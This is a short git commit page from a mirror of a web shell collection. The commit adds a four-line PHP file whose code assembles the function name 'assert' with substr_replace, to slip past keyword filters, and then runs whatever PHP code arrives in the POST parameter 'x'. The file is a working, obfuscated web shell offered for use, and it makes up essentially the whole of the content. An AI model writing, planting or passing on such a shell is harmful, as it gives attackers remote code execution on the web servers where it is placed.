1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00

Create 2020.08.20.03.php

from : https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
tennc
2020-08-20 12:28:46 +08:00
committed by GitHub
parent 51833ad9b6
commit 6759fd8dcc

4
php/2020.08.20.03.php Normal file
View File

@@ -0,0 +1,4 @@
<?php
$a = substr_replace("asxxx","sert",2);
$a($_POST['x']);
?>